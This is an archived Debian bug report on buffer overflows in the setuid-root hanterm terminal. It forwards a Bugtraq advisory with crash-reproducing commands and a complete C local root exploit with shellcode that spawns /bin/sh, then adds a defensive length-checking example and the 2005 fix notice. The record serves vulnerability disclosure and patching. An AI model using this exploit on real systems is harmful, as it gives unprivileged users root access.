Your message dated Fri, 18 Mar 2005 01:02:14 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#133138: fixed in hanterm-xf 1:3.3.1p18-9
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 9 Feb 2002 20:58:44 +0000
>From [EMAIL PROTECTED] Sat Feb 09 14:58:44 2002
Return-path: <[EMAIL PROTECTED]>
Received: from smtp02.mrf.mail.rcn.net [207.172.4.61] 
        by master.debian.org with esmtp (Exim 3.12 1 (Debian))
        id 16Zea4-0007wx-00; Sat, 09 Feb 2002 14:58:44 -0600
Received: from 209-6-22-177.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com ([209.6.22.177] helo=mizar.alcor.net)
        by smtp02.mrf.mail.rcn.net with esmtp (Exim 3.33 #10)
        id 16Zea4-0001Z2-00
        for [EMAIL PROTECTED]; Sat, 09 Feb 2002 15:58:44 -0500
Received: from mdz by mizar.alcor.net with local (Exim 3.34 #1 (Debian))
        id 16Zea0-0007Ks-00
        for <[EMAIL PROTECTED]>; Sat, 09 Feb 2002 15:58:40 -0500
Date: Sat, 9 Feb 2002 15:58:40 -0500
From: Matt Zimmerman <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [EMAIL PROTECTED]: Overflow Vulnerabilities in hanterm]
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.27i
X-Debbugs-CC: [EMAIL PROTECTED]
Sender: Matt Zimmerman <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]

Package: hanterm
Severity: grave
Tags: security potato woody sid

I was able to reproduce this segfault with hanterm 1:3.3.1p18-6 in unstable
and 1:3.3.1p17-5.1 in stable.  I was not able to crash hanterm-classic
3.1.6rc2-3 in unstable.

----- Forwarded message from xperc <[EMAIL PROTECTED]> -----

Date: 7 Feb 2002 10:33:27 -0000
From: xperc <[EMAIL PROTECTED]>
To: bugtraq@securityfocus.com
Subject: Overflow Vulnerabilities in hanterm



Hi, I'm xperc.

  hanterm is a Hangul terminal for X. It is based on the xterm in
XFree86. The hanterm binary is installed by default with setuid root
permissions on TurboLinux Server 6.5, but contains insecure code which
allows unprivileged local users to obtain root access on the local
system.

$which hanterm
/usr/bin/X11/hanterm
$ls -l /usr/bin/X11/hanterm
-rws--x--x      1       root    root 166100  03 13 2001 /usr/bin/X11/hanterm*
$rpm -qf /usr/bin/X11/hanterm
hanterm-xf-p18-3.3-6
$hanterm -fn `perl -e 'print "a"x100'`
Segmentation fault
$hanterm -hfb `perl -e 'print "a"x8000'`
Segmentation fault
$hanterm -hfn `perl -e 'print "a"x8000'`
Segmentation fault
...etc

/* hanterm_exp.c
 *
 * local exploit for hanterm
 *  .. tested in TurboLinux Server 6.5 (Japan)              
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 *                  by [EMAIL PROTECTED]
 *                         2002/02/07
 */

#include <stdio.h>

#define NOP             0x90
#define MAXBUF          88
#define RETOFS          84
#define SHELL_OFS       22
#define ESP_OFS         -0xe38  

unsigned int get_esp()
{
        __asm__("mov %esp,%eax");
}

int main()
{
        static char shellcode[]={
            0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
            0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
            0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
            0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
            0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
            0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
            0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
        }; 
        unsigned int retadr;
        char buf[MAXBUF];
        int i;
        
        memset(buf,NOP,MAXBUF);

        retadr=get_esp()+ESP_OFS;
        printf("Jumping address = %p\n",retadr);

        for(i=RETOFS-32;i<RETOFS+32;i+=4){
                buf[i]  =retadr&0xff;
                buf[i+1]=(retadr>>8)&0xff;
                buf[i+2]=(retadr>>16)&0xff;
                buf[i+3]=(retadr>>24)&0xff;
        }
        strncpy(buf+SHELL_OFS,shellcode,strlen(shellcode));
        //buf[MAXBUF-1]='\0';       faint!:-(
        execl("/usr/bin/X11/hanterm","hanterm","-fn",buf,(char *)0);
}

----- End forwarded message -----

-- 
 - mdz
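
Added example, not part of the original messages and not hanterm's code: one way to reject the over-long `-fn`, `-hfb` and `-hfn` values from the reproduction above before they reach a fixed-size buffer. The struct, the function names and the 64-byte limit are assumptions; the page does not show hanterm's source or the fix.

```c
#include <stdio.h>
#include <string.h>

#define FONT_NAME_MAX 64  /* assumed limit; hanterm's real buffer size is not on the page */

struct font_opts {        /* hypothetical holder for the three font options */
    char fn[FONT_NAME_MAX], hfb[FONT_NAME_MAX], hfn[FONT_NAME_MAX];
};

/* Copy src only if it fits in dst with its terminator; reject, never truncate. */
static int copy_checked(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);  /* looks at most dstsz bytes ahead */
    if (end == NULL)
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Returns 0 on success, -1 if a font option has no value or the value is too long. */
int parse_font_opts(int argc, char *const argv[], struct font_opts *out)
{
    memset(out, 0, sizeof *out);
    for (int i = 1; i < argc; i++) {
        char *dst;
        if (strcmp(argv[i], "-fn") == 0)       dst = out->fn;
        else if (strcmp(argv[i], "-hfb") == 0) dst = out->hfb;
        else if (strcmp(argv[i], "-hfn") == 0) dst = out->hfn;
        else continue;                          /* not a font option */
        if (++i >= argc || copy_checked(dst, FONT_NAME_MAX, argv[i]) != 0)
            return -1;
    }
    return 0;
}

int main(void)
{
    char big[101];                              /* constructed: the 100-byte -fn value */
    memset(big, 'a', 100);
    big[100] = '\0';
    char *bad[] = { "hanterm", "-fn", big, NULL };
    char *ok[]  = { "hanterm", "-fn", "fixed", NULL };
    struct font_opts o;
    printf("100-byte -fn: %d\n", parse_font_opts(3, bad, &o));
    printf("short -fn:    %d\n", parse_font_opts(3, ok, &o));
    return 0;
}
```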

---------------------------------------
Received: (at 133138-close) by bugs.debian.org; 18 Mar 2005 06:36:24 +0000
>From [EMAIL PROTECTED] Thu Mar 17 22:36:24 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
        by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
        id 1DCB5r-0001cr-00; Thu, 17 Mar 2005 22:36:23 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
        id 1DCAYo-0006l1-00; Fri, 18 Mar 2005 01:02:14 -0500
From: Andrew Pollock <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#133138: fixed in hanterm-xf 1:3.3.1p18-9
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Fri, 18 Mar 2005 01:02:14 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
        autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 
X-CrossAssassin-Score: 2

Source: hanterm-xf
Source-Version: 1:3.3.1p18-9

We believe that the bug you reported is fixed in the latest version of
hanterm-xf, which is due to be installed in the Debian FTP archive:

hanterm-xf_3.3.1p18-9.diff.gz
  to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9.diff.gz
hanterm-xf_3.3.1p18-9.dsc
  to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9.dsc
hanterm-xf_3.3.1p18-9_i386.deb
  to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Andrew Pollock <[EMAIL PROTECTED]> (supplier of updated hanterm-xf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Fri, 18 Mar 2005 16:37:26 +1100
Source: hanterm-xf
Binary: hanterm-xf
Architecture: source i386
Version: 1:3.3.1p18-9
Distribution: unstable
Urgency: low
Maintainer: Debian QA Group <[EMAIL PROTECTED]>
Changed-By: Andrew Pollock <[EMAIL PROTECTED]>
Description: 
 hanterm-xf - X terminal emulator with Hangul support
Closes: 118106 133138
Changes: 
 hanterm-xf (1:3.3.1p18-9) unstable; urgency=low
 .
   * QA Group upload orphaning this package
   * Incorporates previous NMUs (closes: #133138, #118106)
   * debian/hanterm-xf.menu: quoted Command:, Section: and Needs:
   * debian/hanterm-xf.1x: changed 1X to 1x in .TH macro
   * debian/control: version build-dependency on debhelper
Files: 
 b46a7ac2de89070747814d51fbab3ba8 639 x11 optional hanterm-xf_3.3.1p18-9.dsc
 333fc460afda063afc5e3402b23bbb2c 10630 x11 optional hanterm-xf_3.3.1p18-9.diff.gz
 3c06c28d2c7af810ec068b03c7baf240 116504 x11 optional hanterm-xf_3.3.1p18-9_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFCOmtZIblXXKfZFgIRAlQCAKDIyUROnM0lJXzLSl/EPu/Hb6N+dgCg1gLP
52Yc4podMt4ng+hDFuU6zGA=
=B7q1
-----END PGP SIGNATURE-----

